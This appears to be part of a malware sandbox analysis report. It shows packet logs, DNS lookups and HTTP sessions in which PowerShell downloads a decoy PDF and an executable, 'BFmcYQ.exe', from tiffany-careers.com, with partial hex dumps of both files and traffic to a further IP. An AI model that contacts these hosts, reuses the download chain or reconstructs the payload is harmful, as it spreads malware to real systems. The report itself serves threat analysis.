                                                                                        Dec 18, 2024 20:55:52.862247944 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.862350941 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.863578081 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.913176060 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.990350008 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.990633965 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.990864992 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.991373062 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.991554022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.991628885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.992197990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.992209911 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.992343903 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.005367041 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.005469084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.005572081 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.005688906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006119967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006129026 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006407022 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.006910086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006928921 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.007033110 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.007919073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.008006096 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.018146992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018157959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018172979 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018182039 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018230915 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.018297911 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.019124985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.019134045 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.019427061 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.020013094 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020030022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020040035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020160913 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.020944118 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020977974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020987988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.021063089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.021063089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.022015095 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.022025108 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.022236109 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.022981882 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.022993088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.023255110 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.023607969 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.023617983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.023772955 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.024419069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.024427891 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.024550915 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.025341034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.025360107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.025482893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.026107073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.026115894 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.026195049 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.027079105 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.027086973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.027203083 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.027993917 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.028003931 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.028104067 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.030571938 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.030586958 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.030685902 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.030695915 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.030723095 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.030739069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.030750990 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.030819893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.031577110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.031586885 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.031682014 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.032495022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.032506943 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.032541990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.032630920 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.033438921 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.033448935 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.033464909 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.033601999 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.033601999 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.034059048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.034069061 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.034199953 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.035250902 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.035260916 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.035377979 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.035736084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.035747051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.035845041 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.036597013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.036606073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.036676884 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.037408113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.037416935 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.037559032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.038222075 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.038230896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.038383961 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.038697004 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.038706064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.038882971 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.041317940 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.041332960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.041409016 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.041584015 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.041599035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.041608095 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.041616917 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.041660070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.041884899 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.042155027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.042536974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.042656898 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.042912006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.042922020 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.043050051 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.044121027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.045514107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.045521975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.045748949 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.045803070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.045977116 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.046432018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.046850920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.047055960 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.047550917 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.047847033 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.048046112 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.048719883 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.048819065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.048891068 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.050199986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.050209999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.050226927 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.050647020 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.050656080 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.050682068 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.050733089 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.050755024 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.051091909 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.051321030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.051471949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.051778078 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.052220106 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.052328110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.052419901 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.052664042 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.052786112 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.053045034 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.053653955 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.053673983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.053812981 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.054894924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.054904938 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.055129051 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.057552099 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.100399971 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.182481050 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.182720900 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.182836056 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.182878017 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.183089018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.183165073 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.183701038 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.183952093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.184079885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.184959888 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.240627050 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.528883934 CET4979580192.168.2.7139.99.188.124

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 18, 2024 20:55:23.663012981 CET5143953192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:55:23.893996000 CET53514391.1.1.1192.168.2.7
                                                                                        Dec 18, 2024 20:55:45.314969063 CET5315453192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:55:56.099431038 CET6069653192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:55:56.321098089 CET53606961.1.1.1192.168.2.7
                                                                                        Dec 18, 2024 20:56:12.431711912 CET4936753192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:56:12.712999105 CET53493671.1.1.1192.168.2.7
                                                                                        Dec 18, 2024 20:56:21.907043934 CET6473653192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:56:22.047095060 CET53647361.1.1.1192.168.2.7
                                                                                        Dec 18, 2024 20:56:36.987596989 CET5137953192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:56:37.125062943 CET53513791.1.1.1192.168.2.7
                                                                                        Dec 18, 2024 20:57:01.242357969 CET6324653192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:57:01.379673004 CET53632461.1.1.1192.168.2.7
                                                                                        Dec 18, 2024 20:57:25.710607052 CET5246153192.168.2.71.1.1.1
                                                                                        Dec 18, 2024 20:57:25.847764015 CET53524611.1.1.1192.168.2.7

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 18, 2024 20:55:23.663012981 CET192.168.2.71.1.1.10xada9Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:55:45.314969063 CET192.168.2.71.1.1.10x4296Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:55:56.099431038 CET192.168.2.71.1.1.10x7f86Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:56:12.431711912 CET192.168.2.71.1.1.10x4c95Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:56:21.907043934 CET192.168.2.71.1.1.10x8d43Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:56:36.987596989 CET192.168.2.71.1.1.10x43feStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:57:01.242357969 CET192.168.2.71.1.1.10xc683Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:57:25.710607052 CET192.168.2.71.1.1.10x8eb2Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 18, 2024 20:55:14.490637064 CET1.1.1.1192.168.2.70x79baNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 20:55:14.490637064 CET1.1.1.1192.168.2.70x79baNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:55:23.893996000 CET1.1.1.1192.168.2.70xada9No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:55:45.454336882 CET1.1.1.1192.168.2.70x4296No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 18, 2024 20:55:56.321098089 CET1.1.1.1192.168.2.70x7f86Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:56:12.712999105 CET1.1.1.1192.168.2.70x4c95Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:56:22.047095060 CET1.1.1.1192.168.2.70x8d43Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:56:37.125062943 CET1.1.1.1192.168.2.70x43feName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:57:01.379673004 CET1.1.1.1192.168.2.70xc683Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 18, 2024 20:57:25.847764015 CET1.1.1.1192.168.2.70x8eb2Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • tiffany-careers.com
                                                                                        • 139.99.188.124

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749742147.45.49.155808128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 18, 2024 20:55:32.184206009 CET77OUTGET /test.pdf HTTP/1.1
                                                                                        Host: tiffany-careers.com
                                                                                        Connection: Keep-Alive
                                                                                        Dec 18, 2024 20:55:33.576278925 CET1236INHTTP/1.1 200 OK
                                                                                        etag: "f92-675e8557-25346;;;"
                                                                                        last-modified: Sun, 15 Dec 2024 07:29:27 GMT
                                                                                        content-type: application/pdf
                                                                                        content-length: 3986
                                                                                        accept-ranges: bytes
                                                                                        date: Wed, 18 Dec 2024 19:55:33 GMT
                                                                                        server: LiteSpeed
                                                                                        connection: Keep-Alive
                                                                                        Data Raw: 25 50 44 46 2d 31 2e 33 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31 20 30 20 52 0a 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 38 37 39 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 54 4d 93 d3 3a 10 bc f3 2b e6 08 55 fb 84 bf 3f f6 c6 2e 50 f5 de 2b aa 28 48 c1 85 8b 62 4f 12 b1 b6 14 24 25 a9 fc 7b 66 a4 38 4e c8 2e 27 c7 8e 46 dd d3 dd 33 19 fc f7 2a 11 65 0d 87 57 0f 0b 78 fb 31 85 b4 10 49 02 8b 15 7c 58 f0 a7 34 69 44 db 42 dd 96 22 ad 61 d1 c3 eb 2f 66 40 30 2b 90 1a de f5 7b b4 5e 39 a5 d7 f0 28 c7 ad 54 6b 0d 9f a4 96 6b b4 a0 34 48 78 34 f4 55 1f df c0 e2 e7 e9 c2 b7 1f 33 48 b3 19 23 11 55 d5 c2 22 e0 e7 a9 48 1b a8 f3 56 24 11 6b b1 c1 bf 83 48 4f 20 5d 04 81 ed 20 8f 8e df ad f2 aa 93 03 58 a6 4a 3c 0c dd e0 10 f9 06 a9 7b 18 b9 98 5e 26 56 c9 35 [TRUNCATED]
                                                                                        Data Ascii: %PDF-1.33 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 4 0 R>>endobj4 0 obj<</Filter /FlateDecode /Length 879>>streamx}TM:+U?.P+(HbO$%{f8N.'F3*eWx1I|X4iDB"a/f@0+{^9(Tkk4Hx4U3H#U"HV$kHO ] XJ<{^&V5|:z:j27 n=QAai<H|#?]HW%Y{kCY)Xg>$vb+co),6E>>Rk~nI]kVGdBvRiOrE*)sylC${v\ ***\#a&pP~QG92WJ#tPf,]n)/a0<$a|&OY-N=R3M&Daj>!ZJGcycx7wdEj|E&XQ,J>)7%Z9uK7\u#FAlC@N^e]dM)8}|cV3.>Vufqrw-,HU]eh 48jc?Ltcfi${I"vRc[\v]^<MKQL+4vI\6 Ht.^n!O\>
                                                                                        Dec 18, 2024 20:55:33.576478958 CET1236INData Raw: 1c 6f bd 2f 1b 51 57 27 eb c9 86 2e 0a 7e da 04 92 72 89 34 6d 97 3b 28 36 1b b0 7e 03 cf d2 4e 60 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31
                                                                                        Data Ascii: o/QW'.~r4m;(6~N`endstreamendobj5 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 6 0 R>>endobj6 0 obj<</Filter /FlateDecode /Length 872>>streamx}UKo8W{)][/5YK@Rv_3G$6^%$
                                                                                        Dec 18, 2024 20:55:33.576828957 CET1236INData Raw: 92 94 5d ff 7d 87 94 17 39 76 0f 06 04 69 66 38 6f a3 13 f8 fe 10 b1 bc 84 fd c3 f3 0a be 7c 4b 20 4e 58 14 c1 aa 83 d7 95 7f 95 c6 2c ae a0 2c 4a 96 25 b0 6a e1 63 c5 e0 d9 70 d5 c2 4f ae f8 06 07 54 ee eb 27 58 bd f9 fa 98 a5 51 0d ab fd a2 31
                                                                                        Data Ascii: ]}9vif8o|K NX,,J%jcpOT'XQ1YT!w(Gh0ru`aF&MqS(k4At}z2OJXZ2[hZvY0<cQzdk,0Ilgh?v.jI:
                                                                                        Dec 18, 2024 20:55:33.576843977 CET529INData Raw: 46 50 44 46 20 31 2e 37 2e 32 20 68 74 74 70 3a 2f 2f 70 79 66 70 64 66 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 30 38 31 31 30 32 34 35 29 0a 3e 3e 0a 65 6e 64 6f
                                                                                        Data Ascii: FPDF 1.7.2 http://pyfpdf.googlecode.com/)/CreationDate (D:20241108110245)>>endobj12 0 obj<</Type /Catalog/Pages 1 0 R/OpenAction [3 0 R /FitH null]/PageLayout /OneColumn>>endobjxref0 130000000000 65535 f 0000003020 00000 n 0000
                                                                                        Dec 18, 2024 20:55:33.975336075 CET55OUTGET /BFmcYQ.exe HTTP/1.1
                                                                                        Host: tiffany-careers.com
                                                                                        Dec 18, 2024 20:55:34.443155050 CET266INHTTP/1.1 200 OK
                                                                                        etag: "108a00-675e85db-25347;;;"
                                                                                        last-modified: Sun, 15 Dec 2024 07:31:39 GMT
                                                                                        content-type: application/x-executable
                                                                                        content-length: 1083904
                                                                                        accept-ranges: bytes
                                                                                        date: Wed, 18 Dec 2024 19:55:34 GMT
                                                                                        server: LiteSpeed
                                                                                        connection: Keep-Alive
                                                                                        Dec 18, 2024 20:55:34.443226099 CET1236INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                        Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D
                                                                                        Dec 18, 2024 20:55:34.443665028 CET1236INData Raw: 00 48 8d 0d 74 87 04 00 48 83 c4 28 e9 27 3e 02 00 cc cc cc 48 83 ec 28 e8 8f 0c 02 00 48 8d 0d 60 87 04 00 48 83 c4 28 e9 0b 3e 02 00 cc cc cc 48 83 ec 28 e8 47 0c 02 00 48 8d 0d 50 87 04 00 48 83 c4 28 e9 ef 3d 02 00 cc cc cc 48 83 ec 28 48 8d
                                                                                        Data Ascii: HtH('>H(H`H(>H(GHPH(=H(HHAH(=H\$UVWATAUAVAWH`HZ3$l$PM$HHt$XLDDH?HvHGHH0DHvHGHH(HvHOHI
                                                                                        Dec 18, 2024 20:55:34.443679094 CET1236INData Raw: 83 fa ff 75 34 80 7b 68 00 0f 85 e7 84 04 00 8b c6 48 8b 5c 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 33 c0 eb e7 e8 fd d1 0a 00 eb b6 89 83 80 00 00 00 eb c4 89 93 84 00 00 00 eb c4 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70
